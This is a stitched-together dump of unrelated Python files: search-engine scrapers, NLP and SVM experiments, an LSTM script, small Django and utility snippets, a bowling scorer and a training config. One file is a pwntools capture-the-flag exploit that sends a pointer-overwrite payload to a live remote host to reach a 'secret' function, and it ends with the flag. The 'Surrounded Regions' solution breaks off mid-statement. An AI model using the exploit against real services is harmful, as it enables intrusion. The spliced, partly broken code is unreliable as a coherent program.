branigan=branigan+1
salida1=''
control1=0
zap=0
except:
pass
if gab=='':
for o in range(0,20):
googletextosfin[o]=googletextos[o]
else:
for s in gab:
for l in range(0,20):
if googletextos[l]=='':
break
if int(l)<int(s):
googletextosfin[l]=googletextos[l]
if int(l)==int(s):
googletextosfin[int(s)]='-'
googletextosfin[int(s)+1]=googletextos[int(s)]
if int(l)>int(s) :
googletextosfin[l+1]=googletextos[int(l)]
print '\n'
print googletextosfin[:]
print '\n'
print 'BUSCANDO EN bing.......'+('\n'*3)
br.open( "http://bing.com" )
br.select_form( nr=0 )
br.form[ 'q' ] = obag
br.submit()
binghtml=''
inicio1=timeit.default_timer()
soup = BeautifulSoup(br.response().read())
for i,link in enumerate(soup.find_all('a')):
binghtml=binghtml+(str(link.get('href'))+'\n')
a=''
for mod in obag:
if mod==' ':
a=a+'+'
else:
a=a+mod
lin1='/search?q='+a+'&go=&qs=ds&lf=1&qpvt='+a
lin2='/search?q='+a+'&go=&qs=ds&first=11&FORM=PERE'
lin3='/search?q='+a+'&go=&qs=ds&first=21&FORM=PERE1'
lin4='/search?q='+a+'&go=&qs=ds&first=31&FORM=PERE2'
lin5='/search?q='+a+'&go=&qs=ds&first=41&FORM=PERE3'
lin6='/images/search?q='+a+'&FORM=HDRSC2'
bingpagina1=''
bingpagina2=''
bingpagina3=''
bingpagina4=''
bingpagina5=''
bingimagenes=''
euro=''
for lin in binghtml:
if lin=='\n':
if euro == lin1:
bingpagina1=euro
eouro=''
if euro == lin2:
bingpagina2=euro
eouro=''
if euro == lin3:
bingpagina3=euro
eouro=''
if euro == lin4:
bingpagina4=euro
eouro=''
if euro == lin5:
bingpagina5=euro
eouro=''
if euro == lin6:
bingimagenes=euro
eouro=''
else:
euro=''
else:
euro=euro+lin
bingpaginas=['']*20
bingtitulos=['']*20
bingtextos=['']*20
br.open('http://bing.com'+bingpagina1)
soup1 = BeautifulSoup(br.response().read())
relog=0
for link in soup1.findAll(attrs={'class' : "b_algo"}):
try:
man=str(link.a)
bingcont=0
bingpag=''
for guf in man:
if guf=='"':
bingcont=bingcont+1
if bingcont==3 and guf!='"':
bingpag=bingpag+guf
if bingcont==4:
bingpaginas[relog]=bingpag
break
men=str(link.a)
bingtitulo=''
aut=0
for guf in men:
if guf=='>':
aut=1
if guf=='<':
aut=0
if aut==1 and guf!='>':
bingtitulo=bingtitulo+guf
bingtitulos[relog]=bingtitulo
bingtextos[relog]=link.text
except:
pass
relog=relog+1
print bingpaginas
print '\n'
print bingtitulos
print '\n'
print bingtextos
#
print '\n'
print 'BUSCANDO EN YAHOO .........'+'\n'
yahoob=''
for a in obag:
if a==' ':
yahoob=yahoob+'+'
else:
yahoob=yahoob+a
br=Browser()
br.set_handle_robots(False)
br.addheaders=[('User-agent','Chrome')]
br.open('https://espanol.search.yahoo.com/search?cs=bz&p='+yahoob+'&fr=fp-tts-706&fr2=ps&woeid=376229&fp=1')
br.submit
yahoohtml=''
soupyahoo = BeautifulSoup(br.response().read())
for link in (soupyahoo.find_all('a')):
yahoohtml=yahoohtml+(str(link.get('href'))+'\n')
acumulador=''
yahooenlace1=''
yahooenlace2=''
yahooenlace3=''
yahooenlace4=''
yahooenlace5=''
yahooimagenes=''
contyahoo=0
tot=0
for mza0 in yahoohtml:
if mza0=='\n':
tot=tot+1
for mza in yahoohtml:
if mza=='\n':
contyahoo=contyahoo+1
if contyahoo==27:
yahooimagenes=acumulador
acumulador=''
if contyahoo==33:
yahooenlace1=acumulador
acumulador=''
if contyahoo==(tot-9):
yahooenlace2=acumulador
acumulador=''
if contyahoo==(tot-8):
yahooenlace3=acumulador
acumulador=''
if contyahoo==(tot-7):
yahooenlace4=acumulador
acumulador=''
if contyahoo==(tot-6):
yahooenlace5=acumulador
acumulador=''
else:
acumulador=''
else:
acumulador=acumulador+mza
yahoopaginas=['']*20
yahootitulos=['']*20
yahootextos=['']*20
br.open(str(yahooenlace1))
yahooex=''
yahoocont=0
yahoosalida=''
yahoosalida1=''
yahookey=0
mm=''
yahooguia=0
souphtml=BeautifulSoup(br.response().read())
for link in souphtml.findAll(attrs={'class' : "yschttl spt"}):
yahooex=''
yahooex=str(link)
for y in yahooex:
if y=='"':
yahoocont=yahoocont+1
if yahoocont==5 and y!='"':
yahoosalida=yahoosalida+y
if yahoocont==6:
rat=0
for m in yahoosalida:
rat=rat+1
mm=mm+m
if rat==4 and mm=='http':
#print yahoosalida
yahoopaginas[yahooguia]=yahoosalida
break
if rat==4 and mm!='http':
#print '-'
yahoopaginas[yahooguia]='-'
break
yahoocont=0
mm=''
yahoosalida=''
break
for z in yahooex:
if z=='>':
yahookey=1
if z=='<':
yahookey=0
if yahookey==1 and z!='>':
yahoosalida1=yahoosalida1+z
yahootitulos[yahooguia]=yahoosalida1
yh1=unicode(' Búsqueda de video ','utf-8')
yh5=unicode(' Resultados de imágenes','utf-8')
yh2=0
yh3=''
for yh in yahoosalida1:
if yh=='-':
yh2=1
if yh2==1 and yh!='-':
yh3=yh3+yh
yh4=unicode(yh3,'utf-8')
if yh4==yh1:
yahootextos[yahooguia]='-'
if yh4==yh5:
yahootextos[yahooguia]='-'
yahoosalida1=''
yahookey=0
yahooguia=yahooguia+1
print '\n'
print yahoopaginas
print '\n'
print yahootitulos
print '\n'
yahoosalidatexto=''
textokey=0
yahootextsalida=''
yahoopaso=0
for link in souphtml.findAll(attrs={'class' : "abstr"}):
yahoosalidatexto=str(link)
for x in yahoosalidatexto:
if x=='>':
textokey=1
if x=='<':
textokey=0
if textokey==1 and x!='>':
yahootextsalida=yahootextsalida+x
if yahootextos[yahoopaso]=='-':
yahootextos[yahoopaso+1]=yahootextsalida
yahoopaso=yahoopaso+1
else:
yahootextos[yahoopaso]=yahootextsalida
textokey=0
yahoosalidatexto=''
yahootextsalida=''
yahoopaso=yahoopaso+1
print yahootextos
fin=timeit.default_timer()
tiempototal= fin-inicio1
print '___________________________________________________________'
print 'TIEMPO TOTAL TRANSCURRIDO: %.3f'%tiempototal,'[SEGUNDOS]'
raw_input('ENTER PARA SALIR')
|
import string
import nltk
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('punkt')
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
lemmatizer = WordNetLemmatizer()
base_document = "This is an example sentence for the document to be compared"
documents = ["This is the collection of documents to be compared against the base_document"]
def preprocess(text):
# Steps:
# 1. lowercase
# 2. Lammetize. (It does not stem. Try to preserve structure not to overwrap with potential acronym).
# 3. Remove stop words.
# 4. Remove punctuations.
# 5. Remove character with the length size of 1.
lowered = str.lower(text)
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(lowered)
words = []
for w in word_tokens:
if w not in stop_words:
if w not in string.punctuation:
if len(w) > 1:
lemmatized = lemmatizer.lemmatize(w)
words.append(lemmatized)
return words
def calculate_jaccard(word_tokens1, word_tokens2):
# Combine both tokens to find union.
both_tokens = word_tokens1 + word_tokens2
union = set(both_tokens)
# Calculate intersection.
intersection = set()
for w in word_tokens1:
if w in word_tokens2:
intersection.add(w)
jaccard_score = len(intersection)/len(union)
return jaccard_score
def process_jaccard_similarity():
# Tokenize the base document we are comparing against.
base_tokens = preprocess(base_document)
# Tokenize each document
all_tokens = []
for i, document in enumerate(documents):
tokens = preprocess(document)
all_tokens.append(tokens)
print("making word tokens at index:", i)
all_scores = []
for tokens in all_tokens:
score = calculate_jaccard(base_tokens, tokens)
all_scores.append(score)
highest_score = 0
highest_score_index = 0
for i, score in enumerate(all_scores):
if highest_score < score:
highest_score = score
highest_score_index = i
most_similar_document = documents[highest_score_index]
print("Most similar document by Jaccard with the score:", most_similar_document, highest_score)
process_jaccard_similarity()
|
# -*- coding: utf-8 -*-
#Tweet classifier using SVM
#Boyang Zhang and Jason Lucibello
import nltk
import numpy as np
#this might be a challenge to install
#from mayavi import mlab
from numpy import exp,arange
from pylab import meshgrid,cm,imshow,contour,clabel,colorbar,axis,title,show
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d, Axes3D
from sklearn import svm, grid_search
from sklearn.datasets import make_moons
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_selection import SelectFwe
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import train_test_split
from sklearn.metrics import classification_report
import random, re, collections, itertools
from matplotlib import cm, mlab
from sklearn import svm, datasets
from matplotlib.ticker import LinearLocator, FormatStrFormatter
from scipy.sparse import coo_matrix
sentiments = [1 ,2, 3]
target_names = ["Self", "Another Person", "General Statement"]
dv = DictVectorizer()
le = LabelEncoder()
def removeNonAscii(s): return "".join(i for i in s if ord(i)<128)
def plot_coo_matrix(m):
if not isinstance(m, coo_matrix):
m = coo_matrix(m)
fig = plt.figure()
ax = fig.gca(projection='3d')
return ax
def parse_labeled_data(filename):
#variable setup
ones, twos, threes, tweets_and_labels = ([] for i in range(4))
tweet, label = '', ''
i = 1
newFile = open('../training_data/ordered_tweets.txt', 'w')
dup = open('duplicates.txt', 'w')
with open(filename, 'r') as f:
for line in f:
if line.startswith('###'):
continue
line = line.rstrip('\n')
#removeNonAscii(line)
#print line
if i % 2 == 1:
line = re.sub('@[^\s]+','USER',line)
line = re.sub("^\s+","", line)
line = re.sub(r'#([^\s]+)', r'\1', line)
#line = re.sub(r'''(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))''','',line)
tweet = line
else:
l = int(line)
if l == 1:
ones.append((tweet, l))
elif l == 2:
twos.append((tweet, l))
else:
threes.append((tweet, 3))
i = i + 1
duplicates = []
duplicates.extend(ones)
duplicates.extend(twos)
duplicates.extend(threes)
dup.write(str([x for x, y in collections.Counter(duplicates).items() if y > 1]))
#remove duplicates
ones = list(set(ones))
twos = list(set(twos))
threes = list(set(threes))
for item, val in ones:
newFile.write(item + "\n")
newFile.write(str(val) + "\n")
for item, val in twos:
newFile.write(item + "\n")
newFile.write(str(val) + "\n")
for item, val in threes:
newFile.write(item + "\n")
newFile.write(str(val) + "\n")
newFile.close()
smallest = min([len(l) for l in [ones, twos, threes]])
print 'we have ' + str(len(ones)) + ' tweets labeled with a 1'
print 'we have ' + str(len(twos)) + ' tweets labeled with a 2'
print 'we have ' + str(len(threes)) + ' tweets labeled with a 3'
print 'smallest list is of size' + str(smallest)
#shuffling
#random.shuffle(ones)
#random.shuffle(twos)
#random.shuffle(threes)
#trimming
ones = ones[:smallest]
twos = twos[:smallest]
threes = threes[:smallest]
#concatenating
tweets_and_labels.extend(ones)
tweets_and_labels.extend(twos)
tweets_and_labels.extend(threes)
#random.shuffle(tweets_and_labels)
return tweets_and_labels
def normalize(tweet):
# get rid of certain punctuation chars
symbols_to_eliminate = ['.', '-', ',']
for symbol in symbols_to_eliminate:
tweet.replace(symbol, '')
toks = nltk.word_tokenize(tweet)
# only take words - things with lowercase letters
toks = [w.lower() for w in toks]
return toks
def ngrams(iterable, n=1):
l = len(iterable)
for idx in range(l):
if idx + n < l : yield iterable[idx:idx+n]
#returns all n grams in toks
def ngram_features(toks, n=1) :
n_dict = {}
for i in range(1,n+1):
n_dict.update({str(w) : 1 for w in ngrams(toks,i)})
#print n_dict
return n_dict
def get_features(data) :
feat = []
for tweet in data:
toks = normalize(tweet)
#print toks
tweet_feat = ngram_features(toks, 2)
feat.append(tweet_feat)
feats = dv.fit_transform(feat)
return feats
def get_x_y(data):
le.fit(sentiments)
#print data
Y = le.transform([d[1] for d in data])
X = get_features([d[0] for d in data])
print "Y, X SIZE", len(Y)
return Y, X
def min_sparse(X):
if len(X.data) == 0:
return 0
m = X.data.min()
return m if X.getnnz() == X.size else min(m, 0)
def print_top_features(vectorizer, clf, class_labels):
"""Prints features with the highest coefficient values, per class"""
feature_names = vectorizer.get_feature_names()
for i, class_label in enumerate(class_labels):
top20 = np.argsort(clf.coef_[i])[-20:]
print("%s: %s" % (class_label, " ".join(feature_names[j] for j in top20)))
print("\n")
filename = "../training_data/ordered_tweets_no_duplicates.txt"
tweets_and_labels = parse_labeled_data(filename)
#print tweets_and_labels
#random.shuffle(tweets_and_labels)
Y, X = get_x_y(tweets_and_labels)
#X, Y = make_moons(noise=0.3, random_state=0)
#print X, Y
#print nX[0], nY[0]
#splitting training and test set
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.20, random_state=42)
#C = regularization parameter (keeps from overfitting): C is the degree of penalty (L1 or L2) (powers of 10)
#penalty sparse = l2 lowers angle so that no unigram can be super weighted, l1 removes features to shift the curve
#TODO: separate into train test eval
fs = SelectFwe(alpha=700.0)
print "Before", x_train.shape
clf = svm.LinearSVC(C=100, penalty='l2', dual = False)
clf.fit(x_train, y_train)
print "NO FEATURE SELECTION"
print "Training Accuracy"
print clf.decision_function(x_train)
print (classification_report(y_train, clf.predict(x_train), target_names=target_names))
print "Testing Accuracy"
print (classification_report(y_test, clf.predict(x_test), target_names=target_names))
x_train = fs.fit_transform(x_train, y_train)
print "After", x_train.shape
clf.fit(x_train, y_train)
'''
w = clf.coef_
print w
a = np.array(w[0].todense(), dtype=np.float)
b = np.array(w[1].todense(), dtype=np.float)
c = -100*a/b
print a, b, c
xx = np.linspace(-5, 5)
yy = c * xx - clf.intercept_[0] / b
# get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(x_train, y_train)
ww = wclf.coef_[0]
wa = -ww[0] / ww[1]
wyy = wa * xx - wclf.intercept_[0] / ww[1]
# plot separating hyperplanes and samples
h0 = pl.plot(xx, yy, 'k-', label='no weights')
h1 = pl.plot(xx, wyy, 'k--', label='with weights')
pl.scatter(X[:, 0], X[:, 1], c=y, cmap=pl.cm.Paired)
pl.legend()
pl.axis('tight')
pl.show()
'''
'''# the function that I'm going to plot
def z_func(x,y):
return (1-(x**2+y**3))*exp(-(x**2+y**2)/2)
x = arange(-3.0,3.0,0.1)
y = arange(-3.0,3.0,0.1)
X,Y = meshgrid(x, y) # grid of point
Z = z_func(X, Y) # evaluation of the function on the grid
im = imshow(Z,cmap=cm.RdBu) # drawing the function
# adding the Contour lines with labels
cset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)
clabel(cset,inline=True,fmt='%1.1f',fontsize=10)
colorbar(im) # adding the colobar on the right
# latex fashion title
title('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')
show()
fig = plt.figure()
ax = fig.gca(projection='3d')
surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap=cm.RdBu,linewidth=0, antialiased=False)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
'''
'''
clf.fit(x_train, y_train)
w = clf.coef_.todense()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X, Y, Z = axes3d.get_test_data(0.05)
cset = ax.contour(X, Y, Z, 16, extend3d=True)
ax.clabel(cset, fontsize=9, inline=1)
plt.show()
'''
#print_top_features(dv, clf, target_names)
#m = coo_matrix(w)
#print m
#ax = plot_coo_matrix(m)
#ax.figure.show()
# get the separating hyperplane
print "WWWWWWWW", np.array(clf.coef_)
w = np.array(clf.coef_)
print "TESTING", w[:,0]
print np.min(w[:,0])
print clf.intercept_[0]
#print clf.get_params(True)
a = np.divide(-w[:,0], w[:,1])
print a.shape
xx = np.linspace(-5, 5)
print xx.shape, clf.intercept_[0], #clf.support_vectors_
yy = np.dot(a, xx) - np.divide(clf.intercept_[0] ,w[:,1])
print yy
# plot the parallels to the separating hyperplane that pass through the
# support vectors
b = clf.support_vectors_[0]
yy_down = a * xx + (b[1] - a * b[0])
b = clf.support_vectors_[-1]
yy_up = a * xx + (b[1] - a * b[0])
# plot the line, the points, and the nearest vectors to the plane
pl.plot(xx, yy, 'k-')
pl.plot(xx, yy_down, 'k--')
pl.plot(xx, yy_up, 'k--')
pl.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
s=80, facecolors='none')
pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
pl.axis('tight')
pl.show()
print "Training Accuracy"
#print clf.decision_function(x_train)
print (classification_report(y_train, clf.predict(x_train), target_names=target_names))
x_test = fs.transform(x_test)
print "Testing Accuracy"
print (classification_report(y_test, clf.predict(x_test), target_names=target_names))
decisions = clf.decision_function(x_test)
print "DECISION", decisions.shape[1]
#print y_test
X = np.array(decisions[:,0])
#print X
Y = np.array(decisions[:,2])
Z = np.array(decisions[:,1])
points = []
for i, val in enumerate(X):
#print X[i], Y[i], Z[i]
points.append((X[i], Y[i], Z[i]))
points = list(set(points))
print points, len(points)
#print X, Y, Z
new_y = []
print "Y_TEST", len(y_test)
for i, val in enumerate(y_test):
if val == 2:
val = 'b'
mark = 'o'
elif val == 1:
val = 'r'
mark = '+'
else:
val = 'g'
mark = '^'
#print new_y
new_y.append((val, mark))
#print new_y
#print np.array(X)
'''
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i, val in enumerate(np.array(X)):
ax.scatter3D(X[i], Y[i], Z[i], c=new_y[i][0], marker=new_y[i][1])
ax.set_xlabel('Self')
ax.set_ylabel('General Disease')
ax.set_zlabel('Another Person')
ax.set_autoscale_on(True)
plt.show()
'''
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for i, val in enumerate(np.array(X)):
print val
if new_y[i][0] != 'b':
ax2.scatter(X[i], Z[i], c=new_y[i][0], marker=new_y[i][1])
ax2.set_xlabel('Self')
ax2.set_ylabel('Another Person')
ax2.set_autoscale_on(True)
plt.show()
'''
# Define the points in 3D space
# including color code based on Z coordinate.
pts = mlab.points3d(X, Y, Z, Z)
# Triangulate based on X, Y with Delaunay 2D algorithm.
# Save resulting triangulation.
mesh = mlab.pipeline.delaunay2d(pts)
# Remove the point representation from the plot
pts.remove()
# Draw a surface based on the triangulation
surf = mlab.pipeline.surface(mesh)
# Simple plot.
mlab.xlabel("x")
mlab.ylabel("y")
mlab.zlabel("z")
mlab.show()
'''
'''h = .02 # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0 # SVM regularization parameter
#svc = svm.SVC(kernel='linear', C=C).fit(X, Y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, Y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, Y)
lin_svc = svm.LinearSVC(C=C).fit(X, Y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
# title for the plots
titles = ['SVC with linear kernel',
'SVC with RBF kernel',
'SVC with polynomial (degree 3) kernel',
'LinearSVC (linear kernel)']
for i, clf in enumerate((svc, rbf_svc, poly_svc, lin_svc)):
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
pl.subplot(2, 2, i + 1)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
pl.contourf(xx, yy, Z, cmap=pl.cm.Paired)
pl.axis('off')
# Plot also the training points
pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
pl.title(titles[i])
pl.show()
''' |
#130. Surrounded Regions
'''
Given a 2D board containing 'X' and 'O' (the letter O), capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
#BFS, Union Find
class Solution(object):
def solve(self, board):
"""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
"""
def helper(i,j):
if x<0
def dfs(i,j):
if board[i][j]=='O':
queue.append((i,j))
while queue:
curr=queue.popleft()
x,y=curr[0], curr[1]
helper(x-1,y)
helper(x+1,y)
helper(x,y+1)
helper(x,y-1)
if board==None:
return
import collections
queue=collections.deque([])
m=len(board)
n=len(board[0])
for index in range(n):
dfs(0,index)
dfs(m-1,index)
for index in range(m):
dfs(index,0)
dfs(index,n-1)
|
from django.db import models
# Create your models here.
class Post(models.Model):
nama = models.CharField(max_length=255)
alamat = models.TextField()
def __str__(self):
return "{}".format(self.nama) |
# -*- coding: utf-8 -*-
# flake8: noqa
from rest_framework.mixins import DestroyModelMixin as DeleteMixin
from rest_framework.mixins import RetrieveModelMixin as RetrieveMixin
from rest_framework.mixins import UpdateModelMixin as UpdateMixin
from .creation import CreateMixin
from .pagination import ListMixin
|
class Base(object):
pass
class Derived(Base):
pass
print(issubclass(Derived,Base))
print(issubclass(Base,Derived))
d = Derived()
b = Base()
print(isinstance(b,Derived))
print(isinstance(d,Base))
|
import sys
S=0
M=int(sys.stdin.readline().strip())
for i in range(0,M):
t=sys.stdin.readline().strip()
if t.find(' ')>=0:
t,x=t.split()
x=int(x)-1
if t=="add":
S |= (1<<x)
elif t=="remove":
S &= ~(1<<x)
elif t=="check":
if S & (1<<x) :
print(1)
else:
print(0)
elif t=="toggle":
S ^= (1<<x)
elif t=="all":
S=(1<<20)-1
elif t=="empty":
S=0
|
import argparse
version_parser = argparse.ArgumentParser(add_help=False)
version_parser.add_argument('--version',
action='version',
version='%(prog)s script version: 1.0')
|
from typing import Callable
Vector = [float]
ActivationFunc = Callable[[float], float]
def neuron(inputs: Vector, weights: Vector, activation_func: ActivationFunc) -> float:
return activation_func(
sum(
z[0] * z[1] for z in zip([1.0] + inputs, weights)
)
)
def step(x: float) -> float:
return 1 if x > 0 else 0
weights = [-0.25, 1, -0.45]
glenmorangie = [-0.21, 0.18]
talisker = [0.6, -0.31]
print("Glenmorangie:", neuron(glenmorangie, weights, step))
print("Talisker:", neuron(talisker, weights, step)) |
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from q3_run import *
from cs224d.data_utils import *
CONTEXT_SIZE = 5
EMBEDDING_DIM = 10
HIDDEN = 30
BATCH_SIZE = 5
NUM_LAYER=2
SEQ = 1
class LSTMTagger(nn.Module):
def __init__(self, embedding_dim, hidden_dim, tagset_size):
super(LSTMTagger, self).__init__()
self.hidden_dim = hidden_dim
# The LSTM takes word embeddings as inputs, and outputs hidden states
# with dimensionality hidden_dim.
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers= NUM_LAYER)
# The linear layer that maps from hidden state space to tag space
self.hidden2tag = nn.Linear(hidden_dim, tagset_size)
self.hidden = self.init_hidden()
def init_hidden(self):
# Before we've done anything, we dont have any hidden state.
# Refer to the Pytorch documentation to see exactly
# why they have this dimensionality.
# The axes semantics are (num_layers, minibatch_size, hidden_dim)
return (torch.zeros(NUM_LAYER, BATCH_SIZE, self.hidden_dim),
torch.zeros(NUM_LAYER, BATCH_SIZE, self.hidden_dim))
def forward(self, sentence):
lstm_out, self.hidden = self.lstm(
sentence.view(SEQ, BATCH_SIZE, -1), self.hidden)
tag_space = self.hidden2tag(lstm_out.view(BATCH_SIZE, -1))
tag_scores = F.log_softmax(tag_space, dim=1)
return tag_scores
total=[]
dataset = StanfordSentiment()
for sentence in dataset.sentences():
for w in sentence:
total.append(w)
print(len(total))
train_sentence = total[:20000]
# print(total)
# we should tokenize the input, but we will ignore that for now
# build a list of tuples. Each tuple is ([ word_i-2, word_i-1 ], target word)
trigrams = [([train_sentence[i], train_sentence[i + 1], train_sentence[i + 2], train_sentence[i + 3],train_sentence[i + 4],
train_sentence[i+1], train_sentence[i+2], train_sentence[i+3], train_sentence[i+4], train_sentence[i+ 5],
train_sentence[i+2], train_sentence[i+3], train_sentence[i+4], train_sentence[i+5],train_sentence[i+6],
train_sentence[i+3], train_sentence[i+4], train_sentence[i+5], train_sentence[i+6], train_sentence[i+7],
train_sentence[i+4], train_sentence[i+5], train_sentence[i+6], train_sentence[i+7], train_sentence[i+8]],
[train_sentence[i + 5], train_sentence[i+6], train_sentence[i+7], train_sentence[i+8], train_sentence[i+9]])
for i in range(0, len(train_sentence)-5, 5)]
# print the first 3, just so you can see what they look like
print(trigrams[:3])
# print(train_sentence)
vocab = set(train_sentence)
word_to_ix = {word: i for i, word in enumerate(vocab)}
dic_list, tok = create_vector()
print(dic_list)
model = LSTMTagger( EMBEDDING_DIM* CONTEXT_SIZE , HIDDEN, len(vocab))
model.load_state_dict(torch.load('epoch_10_LSTM_50_layer3_seq1_batch5'))
product = 1
count = 0
for context, target in trigrams:
vec = []
for i in context:
vec = np.append(vec, dic_list[tok[i.lower()]])
log_probs = model(torch.tensor(vec, dtype=torch.float))
for j in range(BATCH_SIZE):
index = word_to_ix[target[j]]
# print(log_probs[j][index])
prob = np.exp(log_probs[j][index].detach().numpy())
product *= prob
count += 5
if count == 10:
print(count)
PP=product **(-1/count)
print(PP)
break |
def bowlingScore(frames):
frame = frames.split(" ")
score = [[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0,0,0,0]]
finalScore = 0
frame[9]+="0"
for i in range(0,3):
score[9][i] = checkValue(frame[9][i])
if score[9][i]=="/": score[9][i] = addSpare(score[9][i-1])
for i in range(8,-1,-1):
score[i][0] = checkValue(frame[i][0])
if len(frame[i])!= 1:
score[i][1] = checkValue(frame[i][1])
else:
score[i][1] = None
if score[i][1]=="/": score[i][1] = addSpare(score[i][0])
for i in range(0,3):
if frame[9][i]=="X": finalScore+=10
if frame[9][i]=="/": finalScore+=int(score[9][i])
if frame[9][i]!="X" and frame[9][i]!="/": finalScore+=int(score[9][i])
for i in range(8,-1,-1):
if frame[i][0]=="X":
finalScore+=10+score[i+1][0]
if score[i+1][1]==None:
finalScore+=score[i+2][0]
else:
finalScore+=score[i+1][1]
else:
if frame[i][1]=="/":
finalScore+=10+score[i+1][0]
else:
finalScore+=score[i][0]+score[i][1]
return finalScore
def checkValue(pin):
if pin == "X": return 10
if pin == "/": return "/"
return int(pin)
def addSpare(pin):
return 10 - int(pin)
xs = bowlingScore('00 00 00 00 00 00 00 00 X 0/X')
# xs = bowlingScore('11 11 11 11 11 11 11 11 11 11')
print xs
# test.it("maybe this bowler should put bumpers on")
# test.assert_equals(bowlingScore('11 11 11 11 11 11 11 11 11 11'), 20)
# test.it("woah! Perfect game!")
# test.assert_equals(bowlingScore('X X X X X X X X X XXX'), 300)
#
# test.assert_equals(bowlingScore('11 11 11 11 11 11 11 11 11 11'), 20)
# test.assert_equals(bowlingScore('X X X X X X X X X XXX'), 300)
# test.assert_equals(bowlingScore('00 5/ 4/ 53 33 22 4/ 5/ 45 XXX'), 115)
# test.assert_equals(bowlingScore('5/ 4/ 3/ 2/ 1/ 0/ X 9/ 4/ 8/8'), 150)
# test.assert_equals(bowlingScore('5/ 4/ 3/ 2/ 1/ 0/ X 9/ 4/ 7/2'), 143)
# test.assert_equals(bowlingScore('X X 9/ 80 X X 90 8/ 7/ 44'), 171)
# test.assert_equals(bowlingScore('6/ 5/ 6/ 2/ 3/ 0/ 1/ 8/ 3/ 6/5'), 139)
# test.assert_equals(bowlingScore('00 00 00 00 00 00 00 00 00 0/X'), 20)
import random
for rtest in range(0,1):
xframe = []
for pinchoice in range(0,9):
xpin1 = random.randint(0,10)
if xpin1 != 10:
xpin2 = random.randint(0,10-xpin1)
if xpin1 + xpin2 == 10:
xframe.append(str(xpin1)+"/")
else:
xframe.append(str(xpin1)+str(xpin2))
else:
xframe.append("X")
xendframe = ["XXX","12","1/X","34","53","XX1"]
xframe.append(xendframe[random.randint(0,len(xendframe)-1)])
xframe = " ".join(xframe)
print xframe
|
from pwn import *
# s= process('./notepad')
s = remote("46.101.23.188",32663)
elf = ELF('./notepad')
pause()
secret_func = elf.symbols['secret']
log.info("secret at: 0x%x"%secret_func)
def add_note(size,note):
s.sendlineafter(">","1")
s.sendlineafter('size',str(size))
s.sendlineafter("Note:",str(note))
payload = b'n'*0x50+ p64(secret_func)*2
add_note(10,'tuanle')
add_note(10,'tuanle')
add_note(10,'tuanle')
s.sendlineafter("do you want to use it? (y/n)",payload)
# s.sendlineafter('size',str(10))
# s.sendlineafter("Note:","lala")
s.interactive()
s.close()
# HTB{4lw4ys_ch4ck_l3ngth_0f_n0t3s} |
# Basic training configuration file
import torch
from torch.optim import Adam
from torch.optim.lr_scheduler import MultiStepLR
from torchvision.transforms import RandomHorizontalFlip, Compose, RandomResizedCrop
from torchvision.transforms import FiveCrop, Lambda, Resize
from torchvision.transforms import ColorJitter, ToTensor, Normalize
from common.dataset import FilesFromCsvDataset
from common.data_loaders import get_data_loader
from models.model_on_crops import FurnitureModelOnCrops
from pretrainedmodels.models.inceptionv4 import inceptionv4
SEED = 12
DEBUG = True
DEVICE = 'cuda'
OUTPUT_PATH = "output"
single_img_augs = Compose([
RandomHorizontalFlip(p=0.5),
ColorJitter(hue=0.12, brightness=0.12),
ToTensor(),
Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
])
size = 180
augs_branch_1 = RandomResizedCrop(size, scale=(0.7, 1.0), interpolation=2)
augs_branch_2 = Compose([Resize(int(1.9 * size), interpolation=2), FiveCrop(size=size)])
TRAIN_TRANSFORMS = Compose([
Lambda(lambda img: (augs_branch_1(img), ) + augs_branch_2(img)),
Lambda(lambda crops: torch.stack([single_img_augs(crop) for crop in crops]))
])
VAL_TRANSFORMS = TRAIN_TRANSFORMS
BATCH_SIZE = 24
NUM_WORKERS = 15
